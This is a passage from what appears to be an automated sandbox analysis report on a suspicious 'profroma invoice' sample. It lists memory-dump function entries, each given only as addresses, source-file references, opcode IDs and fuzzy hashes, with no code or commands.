                                                          • Instruction Fuzzy Hash: 48119A71541228ABDB65AB24CC46FE8B2B8EF04710F5041D5AB18A60E5EB709E85CF84
                                                          Function 017A6050 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8797c39ddbf2ce064b785662e1964ba5569ec3b8dc5d8c9f627f73311e421566
                                                          • Instruction ID: 28ffb0c60e1d132be0902933a71a166383f9229d18d01441493ed7ec0ac86b66
                                                          • Opcode Fuzzy Hash: 8797c39ddbf2ce064b785662e1964ba5569ec3b8dc5d8c9f627f73311e421566
                                                          • Instruction Fuzzy Hash: 5A112973900119ABCB11DB94CC84EDFBB7CEF48258F044166E906E7211EA34EA55CBE0
                                                          Function 0172208A Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction ID: f161a8c5f123a8b9d3de0aafbc56b135d44533fca2f5fb499c660fdf138db33e
                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction Fuzzy Hash: FC0128326001208BEF218E6DD884B52F767FFC4700F1544A5EE158F25BDA75CC82C3A0
                                                          Function 017B6500 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab1073bea08855e27c836188d57c4606f2ccf955b635b972bf2bf5adb076a975
                                                          • Instruction ID: abec055873f5dccf4d9aa6ec08e8e232377c5c007b05e2e004e7ec5509a14478
                                                          • Opcode Fuzzy Hash: ab1073bea08855e27c836188d57c4606f2ccf955b635b972bf2bf5adb076a975
                                                          • Instruction Fuzzy Hash: 85118E726441469FD711CF58D840BE6FBB9BF9A314F188159F948CB316D732E981CBA0
                                                          Function 017AC810 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f3d6de2342cc4e98fb9a1040eee1ccdecc0ec34cb90e421988484b35fd8d1b1
                                                          • Instruction ID: ed1fc1eb6aa7aeb68e123e67936f3fee9a719830b305fb9941fd0680f4137f2c
                                                          • Opcode Fuzzy Hash: 9f3d6de2342cc4e98fb9a1040eee1ccdecc0ec34cb90e421988484b35fd8d1b1
                                                          • Instruction Fuzzy Hash: 8A1118B1E00209ABCB00DFA9D545AAEFBF8FF58250F10406AA905E7355D674EA01CBA4
                                                          Function 017CEA60 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4beba5b3c76e676f801d32260658ce800ec1738a61d521ed84f4051c0de663e1
                                                          • Instruction ID: 407fd51d338378d1cd279b5cb987dd8b2b321c79ca6ecdee727f3ea977523d6f
                                                          • Opcode Fuzzy Hash: 4beba5b3c76e676f801d32260658ce800ec1738a61d521ed84f4051c0de663e1
                                                          • Instruction Fuzzy Hash: 3201B1321402119FC732AE1D844493AFFA9FF91B60B14486EE6455B252CF219E41CB91
                                                          Function 0171C020 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction ID: 6bb84817a9084e29fd009a9bcde9e0f7ccdb253b30c16a1a9caff360cea3cdff
                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction Fuzzy Hash: 5C0128322007459FEF3396ADC804EA7F7F9FFC6210F144419AA468B544DA70E401C760
                                                          Function 017620F0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a7967bd701307d116b0faf70145d6bfac82a9d407d45be59a7c791e51b4ea72
                                                          • Instruction ID: 0ed1758887a144e9f1700308c802cb2ba916c474da24783885fb21ce2c41e7b4
                                                          • Opcode Fuzzy Hash: 2a7967bd701307d116b0faf70145d6bfac82a9d407d45be59a7c791e51b4ea72
                                                          • Instruction Fuzzy Hash: 3F116D75A0120DEFCF15DF64D854EAEBBB9EB84280F004059ED0297255E635AE15CB90
                                                          Function 0175E5CF Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 288fa850d59b4ba6c5f359505e83365be15e1dbfc3642e88b64404050ad6425d
                                                          • Instruction ID: 0bd7276e218fa1161f44ce86ade75b57e145001c25e3c91f56274ae9e2ef4361
                                                          • Opcode Fuzzy Hash: 288fa850d59b4ba6c5f359505e83365be15e1dbfc3642e88b64404050ad6425d
                                                          • Instruction Fuzzy Hash: 3601A772201501BFD711AB79CD84E57F7ACFFD46547100569B60583696DB74FD01C6E0
                                                          Function 017B69C0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c489c6e05d8bc6609ba1287cdca2a40db737f08bba658eba8b64773805dbf42
                                                          • Instruction ID: 58d77444f2d7faedd3a7a1be06562e470c13264c17d621ceef68187e667ba738
                                                          • Opcode Fuzzy Hash: 0c489c6e05d8bc6609ba1287cdca2a40db737f08bba658eba8b64773805dbf42
                                                          • Instruction Fuzzy Hash: 7101FC322242069BD720DF69D8C8AE7FBACFF99660F114129FA5987280E7309A11C7D1
                                                          Function 017AC460 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c13a2ec7367edb5f3bad2f62e6b97cc95b257fe25be86b31c47567c4aa08056
                                                          • Instruction ID: 201a36d1b5296f06db2905cfb57b6a92c6b64e829422196c184c51f7cbbc6a25
                                                          • Opcode Fuzzy Hash: 3c13a2ec7367edb5f3bad2f62e6b97cc95b257fe25be86b31c47567c4aa08056
                                                          • Instruction Fuzzy Hash: AD115B75A0120DABDF16EFA8C844EAEBBB9FB88240F004159BD0197344DA35EA11CB90
                                                          Function 017AC97C Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbd59c5985e3ef47c5b4ca3444eb52a312002028f2051d73ab060c21496aaf1c
                                                          • Instruction ID: 23c0c463ee1db922d87a088bc4fa0697924a17cc99b8b870252f227826696f10
                                                          • Opcode Fuzzy Hash: cbd59c5985e3ef47c5b4ca3444eb52a312002028f2051d73ab060c21496aaf1c
                                                          • Instruction Fuzzy Hash: A61179B16183089FC700DF69D44595BFBF8EF98310F00451AB998D7395E630E900CB92
                                                          Function 017ACA11 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0af8262d5bd9bb570f4885a2c5a123df84bae418410ce381db3283ec22b4aa9
                                                          • Instruction ID: c7c807705bbb777419382a14e49431d46182aa75e92ddb3cff8cb5182d17dc5a
                                                          • Opcode Fuzzy Hash: c0af8262d5bd9bb570f4885a2c5a123df84bae418410ce381db3283ec22b4aa9
                                                          • Instruction Fuzzy Hash: 5E1179B16183089FC310DF69D44595BFBF8FF99350F00851AB958D73A4E630E900CB92
                                                          Function 0173E016 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                          • Instruction ID: c623d940e8c3f5f052a2afd0865b5c6415671946b6a7636991a0337fe9d1f287
                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                          • Instruction Fuzzy Hash: A0018F322015849FE722871DCA48F26FBD8EF85764F1904A1FA05CB692DA39DC40CA21
                                                          Function 0171826B Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                          • Instruction ID: 1aaeaac5c1aaff8e66f6a53c612770e6f739830d1e2a7e43cfe896a6cdaa6571
                                                          • Opcode Fuzzy Hash: 068e6ee9499eff1233581a679f8af6cdb8604b09b01ac9128919b0508c10dc8c
                                                          • Instruction Fuzzy Hash: 0501D432704505DBD715DF6DDC049AAFBA8EF84620F554069AA01D7748DE20DD01C691
                                                          Function 017CEB50 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                          • Instruction ID: 9643851afc86920bee7aeb505b05d1b2fd716732fee28613690e753983e23e44
                                                          • Opcode Fuzzy Hash: b4f1436bb40a72dcf6ad190ca7f237cc3ed2169eed029c05268ce02366228df4
                                                          • Instruction Fuzzy Hash: 4E018F72280601AFD3325E19D840F12FBACEF55F60F15482EB7069F395DAB1A9808B64
                                                          Function 01722582 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                          • Instruction ID: 81e14436c8fc2b617fb630c0be8e8e3f5ff75fa268aa972dde71537a57545851
                                                          • Opcode Fuzzy Hash: 413bc9db31fd2d50276a41f944f5f0e90724df6b13a8614a84f82354d33fc0e7
                                                          • Instruction Fuzzy Hash: 20F0F433641A20B7C7319B5B8D54F07FEA9EBC8A90F148068E6159B641CA30ED02CAB0
                                                          Function 0174C073 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction ID: 019cd12b3c5105ac28fad1716bfe4367ee017775113e331d62d091b4e8a82436
                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction Fuzzy Hash: E5F0C2B2600611ABD329CF4DDC40E57FBEEDBD5A80F048128A605CB220EA31DD04CB90
                                                          Function 017F634F Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dcdf26699117c4a4118cfb77cf21fcde6fccbdecd98337723bc62cd50a736df
                                                          • Instruction ID: ee41a660ea414f25e9d129d1fe7e8fdea382e3d40dda9819811269fa466376e6
                                                          • Opcode Fuzzy Hash: 5dcdf26699117c4a4118cfb77cf21fcde6fccbdecd98337723bc62cd50a736df
                                                          • Instruction Fuzzy Hash: 6A012C75A10209ABDB04DFA9E555AAEF7F8FF58704F10406AFA05E7350D674DA018BA0
                                                          Function 0171C310 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction ID: 217922703f6ab6ed5de3c0742766ab48d9c46137f9e93039b42e1f895cd3b75b
                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction Fuzzy Hash: 0BF0FC332846339BD73316DD4844B2BE9A59FD5A64F190035E3059B64CC9648D0296D2
                                                          Function 017F625D Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a791a3d36f4d35e7429d153aef5d543154fb64ad57e242224a34b6155ac7dab6
                                                          • Instruction ID: 96c4b5130792ebab00c71e3b90ab60b5ea9dfe4ac274fd8f9ce334977e6ba92a
                                                          • Opcode Fuzzy Hash: a791a3d36f4d35e7429d153aef5d543154fb64ad57e242224a34b6155ac7dab6
                                                          • Instruction Fuzzy Hash: 0D012C75A1020AABCB04DFA9D455AAEF7F8EF58304F10406AFA05E7355D674AA01CBA0
                                                          Function 017F62D6 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0ce0b5e891aaf8eeafea05075c96a43ad640139575a8e4b45ff584d4e439d8c
                                                          • Instruction ID: 2a69704e2921854ce06ed64eb36e0070c9c5f0279c5f18a200953f6ee72aabc3
                                                          • Opcode Fuzzy Hash: c0ce0b5e891aaf8eeafea05075c96a43ad640139575a8e4b45ff584d4e439d8c
                                                          • Instruction Fuzzy Hash: 92012C71A10209ABDB04DFA9E445AAEFBF8EF58304F50406AFA15E7391D6749A018BA0
                                                          Function 0175CA6F Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction ID: d968c339aa1af2c8bc1be23335b240b4fdf5c8bce0b0b2e360467d5080d0ca01
                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction Fuzzy Hash: DD01D1322006899BE7339A1DD809F59FF9CEF82750F0840A5FE048B6A2D6B9C940C211
                                                          Function 017F61E5 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                          • Instruction ID: 997b6274db155394ba407b4ce512b1698fcab90bb81a88d9fc1a5f79fa860b5d
                                                          • Opcode Fuzzy Hash: ec91811768f02e0dc22296ed77c0ffd2239f86bf82693c2e742c81600dfa52eb
                                                          • Instruction Fuzzy Hash: A2014F71A102499BDB04DFA9D445AEEFBF8BF58314F14405AF905E7380D774EA01CB94
                                                          Function 017A63C0 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction ID: 2133fff88e108d98b9560dd47fb93b720d36abd221a950d651d3f203b2ac8da8
                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction Fuzzy Hash: 23F01D7220001DBFEF019F94DD80DAFBB7EEB99298B144225FA1192160D635DE21ABA0
                                                          Function 017AA4B0 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                          • Instruction ID: cf2c4790c0fa310b9fb01b97be5766f6b22d7eb874b5402fe392d204fd253b5e
                                                          • Opcode Fuzzy Hash: 506e829eefe733ea03986b578c3505c6bcf582bff51d7aef08bf5150777772a9
                                                          • Instruction Fuzzy Hash: C7018936100209ABCF129F84D840EDA7F66FB8C654F058201FE1866220C336D970EF81
                                                          Function 0171C0F0 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                          • Instruction ID: 138d7eee5fe1ac6e456812b2190f475259e058310ffa9e14e9e50d25e6044bb7
                                                          • Opcode Fuzzy Hash: 864744d2431f03a152796738a1d54b9740cc459c63fe530e657766a03ba76319
                                                          • Instruction Fuzzy Hash: CBF024B12C42415BF7129AAD8C05F23B2A6E7D0661F65806AEB058F2C9EE70DC0183A4
                                                          Function 0175656A Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                          • Instruction ID: f2ef92e5e7ba582ce16bfa975856cccacd41821848e1e274f1616e9dee0e9c43
                                                          • Opcode Fuzzy Hash: 08ed9248b2205344f0a3374d06489690e5895445cd5dac81285ae1dfbea11aa9
                                                          • Instruction Fuzzy Hash: 4001A4702406859BF7729B3CDD5CF25B7A8BB81B48FA80190BE02DB6D6D778D542C610
                                                          Function 017C437C Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction ID: 5b87c964090f5d39246ceae1c2e6a39fb10499298dae7ea809f5419499fa6d92
                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction Fuzzy Hash: F5F02E31341D1347EB75AE2E8834B2EEA559FD0F10B05072C9503EB680DF60DC00C790
                                                          Function 017AE872 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction ID: 99909d4e9e2ddf5132db178c0006e391ebaee6b863a5b85f99e89df0ffe707d4
                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction Fuzzy Hash: 59F0E2337816129BE3318A4ECC80F16F7A8EFD5A60F9A0274A6049B264CB60EC41CBD0
                                                          Function 017AC89D Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1517883762080e5e19b98fb358ba7f5ea7668e1fa72c71499196fb3b6ecfe463
                                                          • Instruction ID: a383d9b4f8389978373a29c6b9b7a5c9c01af835587af8184b061d56828def06
                                                          • Opcode Fuzzy Hash: 1517883762080e5e19b98fb358ba7f5ea7668e1fa72c71499196fb3b6ecfe463
                                                          • Instruction Fuzzy Hash: F2F0AF716193049FC310EF28C445A1AF7E8FF98710F80465ABC98DB398E638EA00CB96
                                                          Function 01750854 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction ID: 1dbe23ff727fd9e16e84fb9ccad1424642bf4cdf163d16b9dc5c6d70982644d0
                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction Fuzzy Hash: DFF0B472650204AFE714DB25CC05F56F7E9EF98350F148078A945D7164FAB0ED11D654
                                                          Function 017AC912 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5cecee4db37304fbca8994430bf74ae11ca42e9b443d9abdd6ebae9a7c8fc37
                                                          • Instruction ID: 70f9cb5a53bbb2a3f80ca55eef6a36f6bef8f92bbd67047e4e8419c4fa071a04
                                                          • Opcode Fuzzy Hash: d5cecee4db37304fbca8994430bf74ae11ca42e9b443d9abdd6ebae9a7c8fc37
                                                          • Instruction Fuzzy Hash: 1DF0AF70A0020DAFCB04EF69C515AAEF7B8EF58300F008055A905EB389DA38EA01CB50
